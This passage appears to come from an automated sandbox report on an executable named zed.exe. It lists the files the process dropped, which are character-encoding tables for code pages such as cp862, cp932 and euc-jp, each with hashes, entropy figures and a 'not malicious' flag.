                                                                                                                                                                                                                                            Preview:# Encoding file: cp862, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..05D005D105D205D305D405D505D605D705D805D905DA05DB05DC05DD05DE05DF..05E005E105E205E305E405E505E605E705E805E905EA00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.518080906819747
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CXHVBUlJvRj7SOVbusZhAMiZyi77qwGuXVFq5EC18wDyV8mK:eMlBVnrAMiwMmw3VFu1LmK
                                                                                                                                                                                                                                            MD5:C93CCDF65F7F349F22855745660F02AE
                                                                                                                                                                                                                                            SHA1:604888B1FB3C57DF47277CDD1153597BA89E8C36
                                                                                                                                                                                                                                            SHA-256:232D6FE34D7151920232EAAE9C515F36400AB64136DCC5B802D6245AC6F5D56B
                                                                                                                                                                                                                                            SHA-512:D5B65AE7353F694A37AF29177BF1A95477918FC5A002C2FE199624BD5B391698807BAECF54225BC40F62B3CA7912C7066A4AAF01B9E3E399133831CAA342BF4F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp863, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200C200E000B600E700EA00EB00E800EF00EE201700C000A7..00C900C800CA00F400CB00CF00FB00F900A400D400DC00A200A300D900DB0192..00A600B400F300FA00A800B800B300AF00CE231000AC00BD00BC00BE00AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.72017408907567
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CwHVBUlJvRj7YOVbusZhAMiZyi77qcHj92OibcDQAyUjSG:5MlrVnrAMiwMmSsNcDQvcSG
                                                                                                                                                                                                                                            MD5:146E0D1779D50E070E0EF875E8374DF8
                                                                                                                                                                                                                                            SHA1:B51E5598712598BC387DD79AE80BD879F139140D
                                                                                                                                                                                                                                            SHA-256:81BEBFD9A61E9F17495763B68D57742FAB2A1A43871015699A2C8E5FDED4EC19
                                                                                                                                                                                                                                            SHA-512:1F0DAD8E77712C5A018894332BE72FF5C546C92F481421CCB8553AD6F1E9A18617765C8CEE4187265CCCB1AB073E221289D34C9AB1F0501231D52C81FC1C932B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp864, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00200021002200230024066A0026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00B000B72219221A259225002502253C2524252C251C25342510250C25142518..03B2221E03C600B100BD00BC224800AB00BBFEF7FEF8009B009CFEFBFEFC009F..00A000ADFE8200A300A4FE8400000000FE8EFE8FFE95FE99060CFE9DFEA1FEA5..0660066106620663066406650666066706680669FED1061BFEB1FEB5FEB9061F..00A2FE80FE81FE83FE85FECAFE8BFE8DFE91FE93FE97FE9BFE9FFEA3FEA7FEA9..FEABFEADFEAFFEB3FEB7FEBBFEBFFEC1FEC5FECBFECF00A600AC00F700D7FEC9..0640FED3FED7FEDBFEDFFE
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5193842128126676
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CsKHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBnAFj18wDyV8mK:gMlBVnrAMiwMm+VRAFj1LmK
                                                                                                                                                                                                                                            MD5:150B2E00B3F84F8075F3653ED7A4C8E0
                                                                                                                                                                                                                                            SHA1:7131DC656EFE1F2277B19DA72F0EEB46B4EC54A0
                                                                                                                                                                                                                                            SHA-256:ADA1A52064EE93EBE6F8A5D101D01F8776038E12F21A5CA1C006EE833577C705
                                                                                                                                                                                                                                            SHA-512:AC56EEB0220826BF8FF6CA52768DB63961AAC46095A2F3EEBA11B5973CC92AF52DFBBE9E85A0DD04CAB8998212FA2599EDD83BAAA7FB2D394E330FF2F7C015DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp865, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D820A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00A4..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5038992968715266
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CCHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9aRme3cB18wDyVNZkR:bMlBVnrAMiwMm8YnsB1wZy
                                                                                                                                                                                                                                            MD5:FC33B5F773E87696A69E8798446E9772
                                                                                                                                                                                                                                            SHA1:4FC5589C1DD88BB8171758BC173A63B3A5687AE5
                                                                                                                                                                                                                                            SHA-256:32A45DEBA933C7ED99141535087A4C99BA79802175E3F762ACA6EB941157F85A
                                                                                                                                                                                                                                            SHA-512:332D2FEC532192F58F792441E61D675A8692C36BECF768D07F64B8C31561CC1A2DF402625A4719E758A9B59DE4228FFE9F94F067E7DC0D82F9DA2D6500E50304
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp866, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..0440044104420443044404
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5261138894265507
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CtHVBUlJvRj7SOVbusZhAMiZyi77qii+lh2o5+hdVMQFhWgCDrKE:EMlBVnrAMiwMmXY2o5+hdVMQFhWf3f
                                                                                                                                                                                                                                            MD5:4A2C66AA630D4AE2BF1E7546DCE2DAE5
                                                                                                                                                                                                                                            SHA1:FABB672957D21CA2B4E0EACA5FCE6093BAACF77A
                                                                                                                                                                                                                                            SHA-256:AFE6ED6EB5D07C45B6B928A48BC5EF57EFCF61602D36FF9FBDE4A8EA3FA6DF75
                                                                                                                                                                                                                                            SHA-512:A548002EB7AF8735DBBBCC9883B44B326F261C02A3C7CE65C373755DD92212A66740112EAE0FC556CAD5B86911709C6DF12167DC5B6AD1E01C6F1EB5AB16DB37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp869, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850386008700B700AC00A620182019038820150389..038A03AA038C00930094038E03AB00A9038F00B200B303AC00A303AD03AE03AF..03CA039003CC03CD039103920393039403950396039700BD0398039900AB00BB..25912592259325022524039A039B039C039D256325512557255D039E039F2510..25142534252C251C2500253C03A003A1255A25542569256625602550256C03A3..03A403A503A603A703A803A903B103B203B32518250C2588258403B403B52580..03B603B703B803B903BA03
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.33737382140564
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CSyHVBUlJvRj7SOVbusZhAMiZyi77qVQEHmEU4AyqU+TWwdd:CMlBVnrAMiwMmWr4AyqUSd
                                                                                                                                                                                                                                            MD5:FC8C876B4738236FC71A1AF96E4566D0
                                                                                                                                                                                                                                            SHA1:DDFDC3F62D99A6BD705CF0719B50F66449C8808A
                                                                                                                                                                                                                                            SHA-256:4F05F31CA026BBFEEEE49ED86504CB060784137A9CFAE0E5954D276E837AB5DE
                                                                                                                                                                                                                                            SHA-512:5BF58A810E029840825FFF3318E90415E6F2B7E46032FD428B4971923D41A64C127A6F438E4894E80EC9604CD34F1D47B4F9A02ABAB3E7D6351611811DC1F2B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp874, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC008100820083008420260086008700880089008A008B008C008D008E008F..009020182019201C201D20222013201400980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E440E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49008
                                                                                                                                                                                                                                            Entropy (8bit):3.5144574650895364
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:R/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSY83+JRS:RVUidzJCurDGSYvW
                                                                                                                                                                                                                                            MD5:EF4508C84A025095B183E6BAD67B1ECD
                                                                                                                                                                                                                                            SHA1:D12D5381D50D578AA8687671DC542C462A7F490D
                                                                                                                                                                                                                                            SHA-256:6D1B512110BEAF2CD1296AC878F51D567848AB4A1CED4F18C72806BB136B3D23
                                                                                                                                                                                                                                            SHA-512:E695E7E6F4A11D5E8D62982E26B69B87DB2F1F3D6B6DCCD5F1DF51879F5C4533265CBD7B785E1F2652D8CA3FC913D4F862E7575F67C636314A6E6956FD96E023
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp932, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):134671
                                                                                                                                                                                                                                            Entropy (8bit):3.5217328918779645
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+CwDua7D90Jz1aDJmnMfEGniOQdH6prJs3inqlW6/t9Qwf+zCt5:j1WVRpe3rpt9hf+Gt5
                                                                                                                                                                                                                                            MD5:CF9CFD6329A4FB6C402052B9417DAC3A
                                                                                                                                                                                                                                            SHA1:75CE13FE1E5898D47B67F951C0C228851F1CC04D
                                                                                                                                                                                                                                            SHA-256:B6EC2BE0504CA62B9D1B6857F6BAA13FFAC5A567D4432F4EAB98ADC830F5D9C3
                                                                                                                                                                                                                                            SHA-512:7E19607EEA5342ECFE92D56DAAE82827DE147AE5AFDA8E9D67FD0970F528902CDE20A8A07CF2F341B926E59BB4FF792872976F1C7C5CD351959A71A8B6A1924A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp936, multi-byte..M..003F 0 127..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):132551
                                                                                                                                                                                                                                            Entropy (8bit):3.100976362851161
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:2UO8ecy5KnSMsDlOmNpkQ4oQHnTApv+ngLbiyEY:2U/etc/sBRZp//r
                                                                                                                                                                                                                                            MD5:03E19A4DE3490A7DC50D04EC1F558835
                                                                                                                                                                                                                                            SHA1:9DFECAE08C98109EAA358F5920AED647888F722B
                                                                                                                                                                                                                                            SHA-256:477F8B79B67F4A22C963EE65B9B387DBD8E4B8F62D800B0A51D2276580C6ADBB
                                                                                                                                                                                                                                            SHA-512:7D6AD30AF75A3AA6332A860C6ABF87BF725EB6B4AF3B37699043A10EF3235471C63D0ECB4D437D5AD9438DF5DA646EB55117A9BB8B55EF6868F71E49035C18B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp949, multi-byte..M..003F 0 125..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):93330
                                                                                                                                                                                                                                            Entropy (8bit):3.319807723045599
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:aAHU3LIkZlmXrd/uQ0ao98ggKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fW:aVduBGf9PgFMT6q95GDRBfW
                                                                                                                                                                                                                                            MD5:1D84B025DAB127F2073947D764D307B6
                                                                                                                                                                                                                                            SHA1:4E3D3CBD96D084836F1FE6F2AA497E3FAA463B9B
                                                                                                                                                                                                                                            SHA-256:F80E05533D1A1494C32F9412E9AD2D9C11FAF9AE0668A6F9D1FA5CEEDC6870E2
                                                                                                                                                                                                                                            SHA-512:188D649F9717F20524AFF47F85C3B23AEC3E7825BF54975285D06C17587D581DC24A3F6A7CAB1703DE7AD5521FE2FE2572DE627A81E6A48049A47BB219ED4AF8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp950, multi-byte..M..003F 0 88..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1113
                                                                                                                                                                                                                                            Entropy (8bit):3.7780987266961663
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:vJMHkUlJvRjmf9RCsUBOdXsCbbNviANpk3m1XFAoE4xSF5HrBPkdn:vKvlA9RCs6CXrViAN51XFA9eSvdPKn
                                                                                                                                                                                                                                            MD5:90FE0C57BBC6C2D8A3324DEB7FD45F3D
                                                                                                                                                                                                                                            SHA1:06B95BE43E4C859A0F1B01384EDD26500C6C1F9E
                                                                                                                                                                                                                                            SHA-256:EB9B262E4D179268E6F017C0D4EF0E7034E31A5B4893595D150640CA1F6A1C45
                                                                                                                                                                                                                                            SHA-512:6A5E67D9F3EC6046C42793E1437B8A6E50EBD72D8EC67FEFEB6DAD6FAB6A5B5C74F939363587D5A6529E217AF54FB8A9CF0F768E114DD931C57887451CACE56E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: dingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A327A
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1073
                                                                                                                                                                                                                                            Entropy (8bit):3.0039861897954805
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XXBcIhJZDgEoQkNCGz0Jyh9lZk3Vmd2QhZLXPiALV3d:dTcNCJEhfZk3Vzox/iqVN
                                                                                                                                                                                                                                            MD5:F7B3771D43BDE6AFF897683BED2FE6AD
                                                                                                                                                                                                                                            SHA1:E70C2C0902413536CB6163752D70F3AE4AF6A967
                                                                                                                                                                                                                                            SHA-256:165BE658AB7D61FFC3DF1E2F1438C2F9FCEE6808A756316302157F44E6D3ACD7
                                                                                                                                                                                                                                            SHA-512:F87DC718EB2DD95237B144FDA090BB636121B9479E492AC94E4F7EBDD88171F070B9E9F6165BDA7B7E2BA2A3E6188B1108D8F91AA5F142CCCFDAD317628DD941
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:S..006F 0 1..00..0000000100020003008500090086007F0087008D008E000B000C000D000E000F..0010001100120013008F000A0008009700180019009C009D001C001D001E001F..0080008100820083008400920017001B00880089008A008B008C000500060007..0090009100160093009400950096000400980099009A009B00140015009E001A..002000A000E200E400E000E100E300E500E700F10060002E003C0028002B007C..002600E900EA00EB00E800ED00EE00EF00EC00DF00210024002A0029003B009F..002D002F00C200C400C000C100C300C500C700D1005E002C0025005F003E003F..00F800C900CA00CB00C800CD00CE00CF00CC00A8003A002300400027003D0022..00D800610062006300640065006600670068006900AB00BB00F000FD00FE00B1..00B0006A006B006C006D006E006F00700071007200AA00BA00E600B800C600A4..00B500AF0073007400750076007700780079007A00A100BF00D000DD00DE00AE..00A200A300A500B700A900A700B600BC00BD00BE00AC005B005C005D00B400D7..00F900410042004300440045004600470048004900AD00F400F600F200F300F5..00A6004A004B004C004D004E004F00500051005200B900FB00FC00DB00FA00FF..00D900F70053005400550056005700580059005A00B200D400D600D200D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):86971
                                                                                                                                                                                                                                            Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                                            MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                                            SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                                            SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                                            SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83890
                                                                                                                                                                                                                                            Entropy (8bit):2.350315390677456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:2GhX8nuQ635vlHptHzh0abNQPQA0OMS2HhFV3:2GikvRpMuNQ4P73
                                                                                                                                                                                                                                            MD5:F2DE0AE66A4E5DD51CC64B08D3709AAB
                                                                                                                                                                                                                                            SHA1:97558A51A6DD6C56FC7A42A4204141A5639021FD
                                                                                                                                                                                                                                            SHA-256:A3C916BA16BCAC9FAA5A1CCC62ACA61452D581CD8BA3EE07EC39122C697274C9
                                                                                                                                                                                                                                            SHA-512:0EAA90100527FF150D2653D7BB57647D69E592BE53B714DDD867114CFCC71E3A76882772F4FAECE040DF09FA8971D1C22DECC497E589B4CA827A6890497A48D9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-jp, multi-byte..M..003F 0 79..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D0000008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):95451
